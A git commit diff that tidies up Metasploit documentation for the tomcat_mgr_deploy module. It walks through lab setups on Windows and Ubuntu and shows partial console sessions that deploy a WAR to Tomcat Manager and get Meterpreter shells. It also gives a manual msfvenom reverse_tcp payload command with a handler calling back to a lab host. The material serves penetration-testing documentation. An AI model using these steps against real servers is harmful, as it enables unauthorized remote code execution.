more cleanup

2024-11-05 14:57:30 +01:00 · 2017-01-15 11:56:11 -05:00 · 2017-01-15 11:56:11 -05:00 · f7276a6a39
commit f7276a6a39
parent bed08db43c
1 changed files with 47 additions and 21 deletions
--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@ -1,21 +1,22 @@
 # Documentation Format
 This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
-This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
+This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.

 # Cleanup
-It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This must be done manually.
+It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This must be done [manually](#manual-cleanup).

 ## Windows (xp sp2)
 ### Tomcat 6 (6.0.48)
 #### Setup

-1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](htp://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)

 The install was default, other than adding a user during install.  No other options were changed.  The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
-For this exploitation, it was changed to simply `manager`
+For this exploitation, it was changed to simply `manager`.
+
+#### text/script Interface Exploitation

-#### text/script Interface
 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:

    ```
@ -24,6 +25,7 @@ For this exploitation, it was changed to simply `manager`
    ```

 2. Restart Tomcat service
+
 3. Exploit:

    ```
@ -63,17 +65,21 @@ For this exploitation, it was changed to simply `manager`
    Meterpreter : java/windows
    
    ```
+
 ### Tomcat 7 (7.0.73)
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup

-1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)

 The install was default, other than adding a user during install.  No other options were changed.
 Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
 So the `/manager/html` page was visible, but deploying from there wasn't possible.

-#### text/script Interface
+#### text/script Interface Exploitation
+
 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:

    ```
@ -82,6 +88,7 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
    ```

 2. Restart the service
+
 3. Exploitation:

    ```
@ -126,16 +133,18 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
    ```

 ### Tomcat 8 (8.0.39)
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup

-1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)

 The install was default, other than adding a user during install.  No other options were changed.
 Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
-So the /manager/html page was visible, but deploying from there wasn't possible.
+So the `/manager/html` page was visible, but deploying from there wasn't possible.

-#### text/script interface
+#### text/script Interface Exploitation

 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the `<tomcat-users` line:

@ -145,6 +154,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
    ```

 2. Restart the service
+
 3. Exploitation:

    ```
@ -183,7 +193,9 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
    ```

 ## Linux
+
 ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
+
 #### Setup

 1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin`
@ -198,6 +210,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
  ```

 2. Restart Tomcat: `sudo service tomcat6 restart`
+
 3. Exploit:

    ```
@ -238,12 +251,12 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
    ```

 ### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
-Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.

 #### Setup
 1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin`

-#### text/script interface
+#### text/script Interface Exploitation

 1. Edit `/etc/tomcat7/tomcat-users.xml` to add:

@ -255,6 +268,7 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
 2. Restart Tomcat: `sudo service tomcat7 restart`
  1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
+
 3. Exploit:

    ```
@ -297,24 +311,31 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
    Meterpreter  : x86/linux
    ```

-#### gui interface
-Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful.  [Manual exploitation is possible](#manual-exploitation)

 ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
 Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup
+
 1. `apt-get install tomcat8 tomcat8-admin`

-#### text/script interface
+#### text/script Interface Exploitation
+
 1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
+
  ```
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-script"/>
  ```
+
 2. Restart tomcat: `sudo service tomcat8 restart`
  1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
+
 3. Exploit:
+
    ```
    msf > use exploit/multi/http/tomcat_mgr_deploy 
    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
@ -353,17 +374,18 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
    Architecture : x64
    Meterpreter  : x86/linux
    ```
-#### gui interface
-Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.

+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful.  [Manual exploitation is possible](#manual-exploitation)

 # Manual Exploitation

 ## Create payload
 This was performed on Windows XP with the following permissions as the user that was used to login:
-Tomcat 6.0.48: manager
-Tomcat 7.0.73: manager-gui
-Tomcat 8.0.39: manager-gui
+
+* Tomcat 6.0.48: manager
+* Tomcat 7.0.73: manager-gui
+* Tomcat 8.0.39: manager-gui

 ```
 /metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
@ -371,7 +393,9 @@ Payload size: 6072 bytes
 Final size of war file: 6072 bytes
 Saved as: meterp.war
 ```
+
 ## Setup Handler
+
 ```
 msf > use exploit/multi/handler 
 msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
@ -385,7 +409,9 @@ msf exploit(handler) > exploit
 [*] Started reverse TCP handler on 192.168.2.117:7777 
 [*] Starting the payload handler...
 ```
+
 ## Deploy
+
 1. With a web browser, browse to `http://<ip>:<port>/manager/html`
 2. Enter credentials (no default)
 3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
@ -405,6 +431,6 @@ OS          : Windows XP 5.1 (x86)
 Meterpreter : java/windows
 ```

-## Cleanup
+## Manual Cleanup

 This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.